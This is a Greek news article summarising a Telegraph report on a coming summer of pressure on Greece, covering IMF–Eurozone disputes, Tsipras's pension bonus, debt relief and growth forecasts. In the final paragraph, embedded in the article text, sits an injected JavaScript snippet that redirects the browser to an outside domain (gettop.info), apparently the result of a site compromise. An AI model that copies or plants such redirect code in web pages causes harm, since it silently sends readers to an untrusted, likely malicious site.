Telegraph: Νέο καλοκαίρι πιέσεων για την Ελλάδα – Δίχως τέλος η ελληνική κρίση

0
10

 

Σε άρθρο της η Telegraph αναλύει τους λόγους για τους οποίους δεν φαίνεται φως στην άκρη του «τούνελ» της ελληνικής κρίσης, ενώ προβλέπει ότι έρχεται νέο καλοκαίρι πίεσης για την Ελλάδα.

«Νοσοκομεία χωρίς σύριγγες. Λεωφορεία που σκουριάζουν παρατημένα γιατί οι αρμόδιες υπηρεσίες δεν μπορούν να ξοδέψουν χρήματα για επισκευές. Οι σκηνές αυτές, φέρνουν περισσότερο στο μυαλό τους απελπισμένους κατοίκους της Βενεζουέλας, παρά τους Έλληνες». Με αυτές τις φράσεις αρχίζει το δημοσίευμα της βρετανικής Telegraph γράφει το δημοσίευμα που κάνει λόγο για νέο καλοκαίρι πιέσεων για την Ελλάδα.

Το δημοσίευμα που αναφέρεται στο άρθρο το οποίο ανήρτησε ο Πολ Τόμσεν στο blog του επισημαίνοντας ότι η «μάχη» που δινόταν πίσω από κλειστές πόρτες στις Βρυξέλλες έγινε τώρα δημόσια «και μπορεί να γίνει άσχημη», επισημαίνει πως δεν θα τελειώνει η λιτότητα στη χώρα μας/ Μάλιστα, αναλυει τον νέο κύκλο εντάσεων που εκδηλώθηκαν τις τελευταίες εβδομάδες, ανάμεσα στην Αθήνα, το ΔΝΤ και τους Ευρωπαίους. Και υπογραμμίζει ότι η περίοδος «ησυχίας» για την Ελλάδα τελείωσε.

Σε μία κίνηση που θεωρήθηκε «σύμβολο ανυπακοής», ο Αλέξης Τσίπρας αποφάσισε να δώσει χριστουγεννιάτικο δώρο στους συνταξιούχους, δωρεάν σχολικά γεύματα για τα φτωχότερα παιδιά και να ακυρώσει την αύξηση του ΦΠΑ, με τις Βρυξέλλες να «παγώνουν» τα βραχυπρόθεσμα μέτρα για το χρέος, σημειώνει η Telegraph. Όπως υπογραμμίζει την ίδια εβδομάδα ανεστάλη το κονδύλι του τριμερούς προγράμματος ανακούφισης για τις αποπληρωμές, κλείδωσαν τα επιτόκια και ακυρώθηκαν οι σχεδιασμένες αυξήσεις στα επιτόκια των αποπληρωμών των ελληνικών δανείων.

Αν και το ζήτημα επιλύθηκε ανήμερα τα Χριστούγεννα με επιστολή του Ευκλείδη Τσακαλώτου προς το Eurogroup, το ΔΝΤ διατηρεί τις αμφιβολίες του ότι τα προσωρινά μέτρα ελάφρυνσης είναι επαρκή, αναφέρεται στο άρθρο της βρετανικής εφημερίδας και προστίθεται: «Η Ευρωζώνη θέλει να δει αποτελέσματα προτού επιτρέψει περαιτέρω ελάφρυνση του χρέους στην Ελλάδα. Με αυτά τα δεδομένα το ΔΝΤ είναι απίθανο να συμμετάσχει στο τρίτο πακέτο διάσωσης«.

«Ωστόσο, οι οικονομικές προβλέψεις δείχνουν ευοίωνες. Η Ευρωπαϊκή Επιτροπή αναμένει ανάπτυξη της ελληνικής οικονομίας κατά 2,7% που θα ακολουθήσει ύφεση φέτος της τάξης του 0,3%. Το πρωτογενές πλεόνασμα αναμένεται να ξεπεράσει το 2%, έναντι του 1,75% που ήταν ο στόχος. Αλλά σε έναν κόσμο που δεν υπάρχει εμπιστοσύνη, οι αξιωματούχοι φοβούνται ότι η δημοσιονομική σύνεση γρήγορα μετατρέπεται σε υπερβολή«.

Το ΔΝΤ πρέπει να πάρει ακόμη 14 δισ. ευρώ, από προηγούμενα προγράμματα διάσωσης και δεν προτίθεται να επαναλάβει τα λάθη του παρελθόντος. Εξάλλου, το ανεξάρτητο γραφείο αξιολόγησης του ίδιου του ΔΝΤ έκρινε ότι το Ταμείο παρέβη τους κανόνες κατά τα προηγούμενα ελληνικά προγράμματα. Ωστόσο, οι Γερμανοί, οι Ολλανδοί, οι Φινλανδοί και οι Αυστριακοί έχουν δηλώσει ότι θέλουν το Ταμείο στο τρίτο πρόγραμμα, σύμφωνα με την Telegraph.

«Οι Γερμανοί θέλουν την τεχνική εμπειρογνωμοσύνη. Θέλουν τη φήμη του ΔΝΤ, γιατί δεν εμπιστεύονται την Κομισιόν σε τεχνικό επίπεδο. Η Κομισιόν στο περιθώριο πάντα παραποιεί τους αριθμούς για να βγαίνουν καλύτερα και θα υπάρξει πολιτική χειραγώγηση της τεχνικής δουλειάς», επεσήμανε η ίδια πηγή, δήλωσε αξιωματούχος στην εφημερίδα

Η Telegraph σημειώνει ότι παρότι δεν υπάρχει απόδειξη για αυτή την παραποίηση, είναι φανερές οι διαφορές ανάμεσα στις οικονομικές εκτιμήσεις του ΔΝΤ και των Βρυξελλών. Αυτές οι διαφορές προκάλεσαν και την κλιμάκωση της έντασης, μετά το άρθρο του Πολ Τόμσεν και του Μορίς Ομπστφελντ, που ζήτησαν περικοπές στις συντάξεις και διεύρυνση της φορολογικής βάσης.

Ο Πιερ Μοσκοβισί αντέδρασε και αυτό προκάλεσε καυστική, όπως τη χαρακτηρίζει το βρετανικό δημοσίευμα, απάντηση του Ταμείου, στην οποία επισημαινόταν ότι οι συντάξεις στην Ελλάδα είναι πιο γενναιόδωρες από τη Γερμανία. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here